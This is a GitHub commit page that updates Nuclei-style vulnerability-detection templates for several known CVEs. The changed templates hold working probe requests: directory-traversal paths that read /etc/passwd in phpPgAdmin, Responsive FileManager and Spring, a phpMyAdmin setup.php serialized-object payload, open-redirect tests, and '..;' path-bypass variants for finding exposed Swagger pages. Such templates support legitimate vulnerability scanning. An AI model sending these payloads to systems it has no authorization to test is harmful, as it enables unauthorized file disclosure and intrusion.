Skip to content

Commit

Permalink
20240826
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Aug 26, 2024
1 parent 2eb80d1 commit 6f9452e
Show file tree
Hide file tree
Showing 29 changed files with 503 additions and 600 deletions.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20240825
20240826
19 changes: 9 additions & 10 deletions poc/cve/cve-2008-5587.yaml
Original file line number Diff line number Diff line change
@@ -1,28 +1,27 @@
id: CVE-2008-5587

info:
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
author: dhiyaneshDK
severity: medium
description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/7363
- http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
- http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
- http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
classification:
cve-id: CVE-2008-5587
reference: https://www.exploit-db.com/exploits/7363

metadata:
shodan-query: http.title:"phpPgAdmin"
tags: cve,cve2008,lfi,phppgadmin
shodan-query: 'http.title:"phpPgAdmin"'
description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."

requests:
- method: GET
path:
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'

matchers-condition: and
matchers:

- type: regex
regex:
- "root:[x*]:0:0"

- type: status
status:
- 200
22 changes: 8 additions & 14 deletions poc/cve/cve-2009-1151.yaml
Original file line number Diff line number Diff line change
@@ -1,21 +1,15 @@
id: CVE-2009-1151

info:
name: PhpMyAdmin Scripts - Remote Code Execution
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
author: princechaddha
severity: critical
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
severity: high
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
- https://nvd.nist.gov/vuln/detail/CVE-2009-1151
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2009-1151
cwe-id: CWE-77
tags: cve,cve2009,phpmyadmin,rce,deserialization,kev


requests:
- raw:
- |
Expand All @@ -26,13 +20,13 @@ requests:
Content-Type: application/x-www-form-urlencoded
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: regex
regex:
- "root:.*:0:0:"

# Enhanced by mp on 2022/07/06
11 changes: 8 additions & 3 deletions poc/cve/cve-2015-5354.yaml
Original file line number Diff line number Diff line change
@@ -1,26 +1,31 @@
id: CVE-2015-5354

info:
name: Novius OS 5.0.1-elche - Open Redirect
author: 0x_Akoko
severity: medium
description: Open redirect vulnerability in Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
reference:
- https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
- https://vuldb.com/?id.76181
- https://nvd.nist.gov/vuln/detail/CVE-2015-5354
- http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
- https://nvd.nist.gov/vul n/detail/CVE-2015-5354
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2015-5354
cwe-id: CWE-601
tags: cve,cve2015,redirect,novius
tags: packetstorm,cve,cve2015,redirect,novius

requests:
- method: GET
path:
- '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'

matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

# Enhanced by mp on 2022/07/22
42 changes: 12 additions & 30 deletions poc/cve/cve-2017-14524.yaml
Original file line number Diff line number Diff line change
@@ -1,43 +1,25 @@
id: CVE-2017-14524

info:
name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect
name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect
author: 0x_Akoko
severity: medium
description: |
OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
impact: |
An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
remediation: |
Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator.
severity: low
description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks.
reference:
- https://seclists.org/fulldisclosure/2017/Sep/57
- https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
- https://nvd.nist.gov/vuln/detail/CVE-2017-14524
- http://seclists.org/fulldisclosure/2017/Sep/57
- https://github.com/ARPSyndicate/cvemon
- https://www.cvedetails.com/cve/CVE-2017-14524
- https://vuldb.com/?id.107201
tags: cve,cve2017,redirect,opentext
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2017-14524
cwe-id: CWE-601
epss-score: 0.00258
epss-percentile: 0.6357
cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: opentext
product: documentum_administrator
tags: cve2017,cve,redirect,opentext,seclists

http:
requests:
- method: GET
path:
- '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me'

- '{{BaseURL}}/xda/help/en/default.htm?startat=//example.com'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
part: header
16 changes: 7 additions & 9 deletions poc/cve/cve-2018-1271.yaml
Original file line number Diff line number Diff line change
@@ -1,20 +1,18 @@
id: CVE-2018-1271

info:
name: Spring MVC Directory Traversal Vulnerability
author: hetroublemakr
severity: medium
description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.
reference:
- https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
- https://pivotal.io/security/cve-2018-1271
- http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699
- https://access.redhat.com/errata/RHSA-2018:1320
reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d

classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.9
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.90
cve-id: CVE-2018-1271
cwe-id: CWE-22
tags: cve,cve2018,spring,lfi,traversal
description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack."

requests:
- method: GET
path:
Expand Down
14 changes: 7 additions & 7 deletions poc/cve/cve-2018-15473.yaml
Original file line number Diff line number Diff line change
@@ -1,28 +1,28 @@
id: CVE-2018-15473

info:
name: OpenSSH Username Enumeration <= v7.7
author: r3dg33k,daffainfo,forgedhallpass
severity: medium
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-15473
- https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
- https://bugs.debian.org/906236
- http://www.openwall.com/lists/oss-security/2018/08/15/5
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cvss-score: 5.3
cve-id: CVE-2018-15473
cwe-id: CWE-362


tags: network,openssh,cve,cve2018
network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"

matchers:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)'

extractors:
- type: regex
regex:
Expand Down
21 changes: 10 additions & 11 deletions poc/cve/cve-2018-15535.yaml
Original file line number Diff line number Diff line change
@@ -1,32 +1,31 @@
id: CVE-2018-15535

info:
name: Responsive FileManager < 9.13.4 - Directory Traversal
name: Responsive FileManager <9.13.4 - Local File Inclusion
author: daffainfo
severity: high
description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal.
description: Responsive FileManager before version 9.13.4 is susceptible to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory. Instead, because it does not properly neutralize get_file sequences such as ".." can resolve to a location that is outside of that directory, aka local file inclusion.
reference:
- https://www.exploit-db.com/exploits/45271
- https://www.cvedetails.com/cve/CVE-2018-15535

- https://nvd.nist.gov/vuln/detail/CVE-2018-15535
- http://seclists.org/fulldisclosure/2018/Aug/34
- https://www.exploit-db.com/exploits/45271/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cvss-score: 7.5
cve-id: CVE-2018-15535
cwe-id: CWE-22

tags: cve,cve2018,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0"

- "root:.*:0:0:"
- type: status
status:
- 200

# Enhanced by mp on 2022/07/07
78 changes: 12 additions & 66 deletions poc/exposed/exposed-swagger.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -13,73 +13,19 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/swagger/"
- "{{BaseURL}}/swagger/index.html"
- "{{BaseURL}}/swagger-ui/index.html"
- "{{BaseURL}}/swagger-ui.html"
- "{{BaseURL}}/api/"
- "{{BaseURL}}/api/docs"
- "{{BaseURL}}/api-doc"
- "{{BaseURL}}/api-docs"
- "{{BaseURL}}/docs/index.html"
- "{{BaseURL}}/docs/"
- "{{BaseURL}}/docs/swagger-ui.html"
- "{{BaseURL}}/api/swagger-ui.html"
- "{{BaseURL}}/swagger/ui/index.html"
- "{{BaseURL}}/swagger/ui/index"
- "{{BaseURL}}/api/swagger/index.html"
- "{{BaseURL}}/api/swagger/ui/index"
- "{{BaseURL}}/api/swagger-ui/index.html"
- "{{BaseURL}}/api/docs/index.html"
- "{{BaseURL}}/api/doc/index.html"
- "{{BaseURL}}/api/index.html"
- "{{BaseURL}}/api/v1/swagger/index.html"
- "{{BaseURL}}/api/v1/swagger-ui/index.html"
- "{{BaseURL}}/api/v1/swagger/ui/index"
- "{{BaseURL}}/api/v1/docs/index.html"
- "{{BaseURL}}/api/v1/docs/swagger-ui/index.html"
- "{{BaseURL}}/api/v1/docs/swagger/index.html"
- "{{BaseURL}}/api/v2/swagger/index.html"
- "{{BaseURL}}/api/v2/docs/swagger-ui/index.html"
- "{{BaseURL}}/api/v2/docs/swagger/index.html"
- "{{BaseURL}}/api/v2/swagger-ui/index.html"
- "{{BaseURL}}/api/v2/swagger/ui/index"
- "{{BaseURL}}/api/v2/docs/index.html"
- "{{BaseURL}}/api/v3/swagger/index.html"
- "{{BaseURL}}/api/v3/swagger-ui/index.html"
- "{{BaseURL}}/api/v3/docs/swagger-ui/index.html"
- "{{BaseURL}}/api/v3/docs/swagger/index.html"
- "{{BaseURL}}/api/v3/swagger/ui/index"
- "{{BaseURL}}/api/v3/docs/index.html"
- "{{BaseURL}}/docs/swagger-ui/index.html"
- "{{BaseURL}}/v1/swagger/index.html"
- "{{BaseURL}}/v1/api"
- "{{BaseURL}}/v1/swagger-ui/index.html"
- "{{BaseURL}}/v1/swagger/ui/index"
- "{{BaseURL}}/v1/docs/index.html"
- "{{BaseURL}}/v1/api-docs/index.html"
- "{{BaseURL}}/v2/swagger/index.html"
- "{{BaseURL}}/v2/api"
- "{{BaseURL}}/v2/api-docs/index.html"
- "{{BaseURL}}/v2/swagger-ui/index.html"
- "{{BaseURL}}/v2/swagger/ui/index"
- "{{BaseURL}}/v2/docs/index.html"
- "{{BaseURL}}/v3/swagger/index.html"
- "{{BaseURL}}/v3/api-docs/index.html"
- "{{BaseURL}}/v3/swagger-ui/index.html"
- "{{BaseURL}}/v3/api"
- "{{BaseURL}}/v3/swagger/ui/index"
- "{{BaseURL}}/v3/docs/index.html"
- "{{BaseURL}}/"
- "{{BaseURL}}/doc/"
- "{{BaseURL}}/v0/"
- "{{BaseURL}}/v1/"
- "{{BaseURL}}/v2/"
- "{{BaseURL}}/v3/"
- "{{BaseURL}}/api/schema/swagger-ui/"

- "{{BaseURL}}/swagger/..;/swagger/index.html"
- "{{BaseURL}}/swagger-ui/..;/swagger-ui/index.html"
- "{{BaseURL}}/api/..;/api/"
- "{{BaseURL}}/api/..;/api/docs/"
- "{{BaseURL}}/api-doc/..;/api-doc"
- "{{BaseURL}}/api-docs/..;/api-docs"
- "{{BaseURL}}/docs/..;/docs/index.html"
- "{{BaseURL}}/api/..;/api/swagger-ui.html"
- "{{BaseURL}}/swagger/..;/swagger/ui/index"
- "{{BaseURL}}/api/..;/api/swagger/index.html"
- "{{BaseURL}}/v1/..;/v1/"

matchers:
- type: word
words:
- "Swagger UI"
- "swagger-ui-"
2 changes: 1 addition & 1 deletion poc/java/spring-functions-rce.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -18,7 +18,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-22963
cwe-id: CWE-94
tags: vulhub,cve,cve2022,springcloud,rce,kev
tags: cve,cve2022,springcloud,rce

requests:
- raw:
Expand Down
Loading

0 comments on commit 6f9452e

Please sign in to comment.